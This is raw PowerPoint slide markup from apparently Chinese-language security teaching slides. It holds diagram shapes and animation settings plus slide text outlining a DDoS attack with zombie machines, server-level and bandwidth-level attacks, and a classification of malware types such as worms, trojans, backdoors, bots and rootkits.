                <a:gd name="T5" fmla="*/ 0 h 29"/>
                <a:gd name="T6" fmla="*/ 25 w 29"/>
                <a:gd name="T7" fmla="*/ 4 h 29"/>
                <a:gd name="T8" fmla="*/ 29 w 29"/>
                <a:gd name="T9" fmla="*/ 17 h 29"/>
                <a:gd name="T10" fmla="*/ 25 w 29"/>
                <a:gd name="T11" fmla="*/ 25 h 29"/>
                <a:gd name="T12" fmla="*/ 16 w 29"/>
                <a:gd name="T13" fmla="*/ 29 h 29"/>
                <a:gd name="T14" fmla="*/ 4 w 29"/>
                <a:gd name="T15" fmla="*/ 25 h 29"/>
                <a:gd name="T16" fmla="*/ 0 w 29"/>
                <a:gd name="T17" fmla="*/ 17 h 29"/>
                <a:gd name="T18" fmla="*/ 0 w 29"/>
                <a:gd name="T19" fmla="*/ 1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17"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4"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7" name="Freeform 84">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{095365FA-30C8-417B-ADDB-7C93B199049D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="49" y="180"/>
              <a:ext cx="200" cy="209"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 200"/>
                <a:gd name="T1" fmla="*/ 181 h 209"/>
                <a:gd name="T2" fmla="*/ 135 w 200"/>
                <a:gd name="T3" fmla="*/ 209 h 209"/>
                <a:gd name="T4" fmla="*/ 200 w 200"/>
                <a:gd name="T5" fmla="*/ 168 h 209"/>
                <a:gd name="T6" fmla="*/ 200 w 200"/>
                <a:gd name="T7" fmla="*/ 0 h 209"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 60000 65536"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 w 200"/>
                <a:gd name="T13" fmla="*/ 0 h 209"/>
                <a:gd name="T14" fmla="*/ 200 w 200"/>
                <a:gd name="T15" fmla="*/ 209 h 209"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T8">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T9">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T10">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T12" t="T13" r="T14" b="T15"/>
              <a:pathLst>
                <a:path w="200" h="209">
                  <a:moveTo>
                    <a:pt x="0" y="181"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200"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4368" name="Freeform 85">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F100DC7-FCD8-4A0E-84FF-F84923CA4027}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="33" y="344"/>
              <a:ext cx="33" cy="33"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 33"/>
                <a:gd name="T1" fmla="*/ 17 h 33"/>
                <a:gd name="T2" fmla="*/ 4 w 33"/>
                <a:gd name="T3" fmla="*/ 4 h 33"/>
                <a:gd name="T4" fmla="*/ 16 w 33"/>
                <a:gd name="T5" fmla="*/ 0 h 33"/>
                <a:gd name="T6" fmla="*/ 28 w 33"/>
                <a:gd name="T7" fmla="*/ 4 h 33"/>
                <a:gd name="T8" fmla="*/ 33 w 33"/>
                <a:gd name="T9" fmla="*/ 17 h 33"/>
                <a:gd name="T10" fmla="*/ 28 w 33"/>
                <a:gd name="T11" fmla="*/ 29 h 33"/>
                <a:gd name="T12" fmla="*/ 16 w 33"/>
                <a:gd name="T13" fmla="*/ 33 h 33"/>
                <a:gd name="T14" fmla="*/ 4 w 33"/>
                <a:gd name="T15" fmla="*/ 29 h 33"/>
                <a:gd name="T16" fmla="*/ 0 w 33"/>
                <a:gd name="T17" fmla="*/ 17 h 33"/>
                <a:gd name="T18" fmla="*/ 0 w 33"/>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17"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="29"/>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9" name="Freeform 86">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E2A5FDD-8D4C-4AA1-94A6-F34F6B030E20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="33" y="283"/>
              <a:ext cx="33" cy="37"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 33"/>
                <a:gd name="T1" fmla="*/ 20 h 37"/>
                <a:gd name="T2" fmla="*/ 4 w 33"/>
                <a:gd name="T3" fmla="*/ 4 h 37"/>
                <a:gd name="T4" fmla="*/ 16 w 33"/>
                <a:gd name="T5" fmla="*/ 0 h 37"/>
                <a:gd name="T6" fmla="*/ 28 w 33"/>
                <a:gd name="T7" fmla="*/ 4 h 37"/>
                <a:gd name="T8" fmla="*/ 33 w 33"/>
                <a:gd name="T9" fmla="*/ 20 h 37"/>
                <a:gd name="T10" fmla="*/ 28 w 33"/>
                <a:gd name="T11" fmla="*/ 33 h 37"/>
                <a:gd name="T12" fmla="*/ 16 w 33"/>
                <a:gd name="T13" fmla="*/ 37 h 37"/>
                <a:gd name="T14" fmla="*/ 4 w 33"/>
                <a:gd name="T15" fmla="*/ 33 h 37"/>
                <a:gd name="T16" fmla="*/ 0 w 33"/>
                <a:gd name="T17" fmla="*/ 20 h 37"/>
                <a:gd name="T18" fmla="*/ 0 w 33"/>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7"/>
                <a:gd name="T32" fmla="*/ 33 w 33"/>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7">
                  <a:moveTo>
                    <a:pt x="0" y="20"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="33"/>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5206" name="Rectangle 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6644CE53-C9DD-4ECF-86F4-3601B635A703}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="28575"/>
            <a:ext cx="8229600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个DDoS攻击过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5207" name="Text Box 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CA28CC6-DEE5-4C69-9024-8D82C580684A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6143625"/>
            <a:ext cx="12192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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0033CC"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zombie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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129"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51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125"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51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animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51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207">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5207">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5207">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="25" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5167"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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7" grpId="0" build="allAtOnce"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7B0D2B6C-A8DF-45DC-A645-62F936B2C4E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码（软件）的分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3340EB0-8FBC-4693-8190-A0ACCE5D2A92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码（软件） ，即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>广义上的计算机病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。其可分为：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（狭义）计算机病毒</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>僵尸</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>勒索软件、流氓软件、间谍软件、广告软件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、黑客工具等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="左大括号 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D72D4373-DF11-4C9B-85C5-2F982FA00611}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1619250" y="2924175"/>
            <a:ext cx="288925" cy="936625"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrac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txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="左大括号 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E12C848-FF24-4241-9355-ADD673097954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1619250" y="4183063"/>
            <a:ext cx="225425" cy="1549400"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F077BD9-1F3B-4DED-904E-FBAE62E52120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1195388" y="2978150"/>
            <a:ext cx="485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t>形态</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0322BF84-0F5E-4BF1-BC89-8F45AA97401A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1195388" y="4537075"/>
            <a:ext cx="485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400"/>
              <a:t>功能</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4" grpId="0"/>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5346" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07EA824B-CB57-4E07-816B-73CA5981AA89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="1196975"/>
            <a:ext cx="8991600" cy="5334000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5664" cy="3360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="185416" name="Picture 3" descr="ISP new Backbone">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75D454DB-BB5C-4B85-81EB-4DA15916C55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5664" cy="3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417" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AD8B204-BCBC-456E-AAB6-6AF02BB2D7B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5169" y="2160"/>
              <a:ext cx="495" cy="354"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F0F0F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grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="185347" name="Picture 5" descr="j0151489">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C77E4B59-920D-4BBD-8C25-1947DF7D2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3313" y="990600"/>
            <a:ext cx="979487"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j0354506">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5C5DE24-67E6-4AD4-A9D1-2BA890F130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1031875"/>
            <a:ext cx="6858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Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7720444-8385-42B6-8C25-49A0028EA337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="3505200"/>
            <a:ext cx="1676400" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9966">
              <a:alpha val="50195"/>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6152" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62981518-51D2-4AA7-BEE0-D82939A0F5AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7086600" y="30480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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server-level DDoS attacks</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6153" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D81F469-12EA-4818-987D-E2BCCDF41985}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5397500" y="4876800"/>
            <a:ext cx="1460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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bandwidth-level DDoS attacks</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6154" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2C22FA7-526A-4288-95BC-DF118564A351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
